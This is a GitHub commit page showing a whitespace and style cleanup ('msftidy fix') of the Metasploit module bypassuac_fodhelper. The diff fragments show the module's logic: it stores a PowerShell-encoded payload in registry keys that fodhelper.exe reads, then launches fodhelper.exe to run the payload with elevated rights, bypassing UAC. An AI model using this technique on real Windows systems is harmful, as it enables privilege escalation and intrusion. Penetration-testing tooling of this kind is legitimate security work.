Skip to content

Commit 93bb47d

Browse files
author
amaloteaux
committed
msftidy fix
1 parent 6f1f630 commit 93bb47d

File tree

2 files changed

+12
-13
lines changed

2 files changed

+12
-13
lines changed

documentation/modules/exploit/windows/local/bypassuac_fodhelper.md

Lines changed: 0 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -20,7 +20,6 @@
2020

2121
##Scenario
2222

23-
2423
```
2524
msf >
2625
[*] Sending stage (1189423 bytes) to 192.168.50.4

modules/exploits/windows/local/bypassuac_fodhelper.rb

Lines changed: 12 additions & 12 deletions
Original file line numberDiff line numberDiff line change
@@ -78,11 +78,11 @@ def exploit
7878
if session.arch == ARCH_X86
7979
# fodhelper.exe is x64 only exe
8080
commspec = '%WINDIR%\\Sysnative\\cmd.exe'
81-
if target_arch.first == ARCH_X64
82-
# We can't use absolute path here as
83-
# %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session
84-
psh_path = "powershell.exe"
85-
end
81+
if target_arch.first == ARCH_X64
82+
# We can't use absolute path here as
83+
# %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session
84+
psh_path = "powershell.exe"
85+
end
8686
end
8787
if target_arch.first == ARCH_X86
8888
# Invoking x86, so switch to SysWOW64
@@ -95,10 +95,10 @@ def exploit
9595
end
9696
end
9797

98-
if !payload.arch.empty? && !(payload.arch.first == target_arch.first)
99-
fail_with(Failure::BadConfig, 'payload and target should use the same architecture')
100-
end
101-
98+
if !payload.arch.empty? && !(payload.arch.first == target_arch.first)
99+
fail_with(Failure::BadConfig, 'payload and target should use the same architecture')
100+
end
101+
102102
# Validate that we can actually do things before we bother
103103
# doing any more work
104104
check_permissions!
@@ -124,7 +124,7 @@ def exploit
124124

125125
template_path = Rex::Powershell::Templates::TEMPLATE_DIR
126126
psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded)
127-
127+
128128
if psh_payload.length > CMD_MAX_LEN
129129
fail_with(Failure::None, "Payload size should be smaller then #{CMD_MAX_LEN} (actual size: #{psh_payload.length})")
130130
end
@@ -145,7 +145,7 @@ def exploit
145145
end
146146

147147
registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
148-
registry_setvaldata(FODHELPER_WRITE_KEY, payload_value,psh_payload, EXEC_REG_VAL_TYPE, registry_view)
148+
registry_setvaldata(FODHELPER_WRITE_KEY, payload_value,psh_payload, EXEC_REG_VAL_TYPE, registry_view)
149149

150150
# Calling fodhelper.exe through cmd.exe allow us to launch it from either x86 or x64 session arch.
151151
cmd_path = expand_path(commspec)
@@ -168,7 +168,7 @@ def exploit
168168
if existing.empty?
169169
registry_deletekey(FODHELPER_DEL_KEY, registry_view)
170170
else
171-
registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
171+
registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
172172
end
173173
registry_deleteval(FODHELPER_WRITE_KEY, payload_value, registry_view)
174174

0 commit comments

Comments
 (0)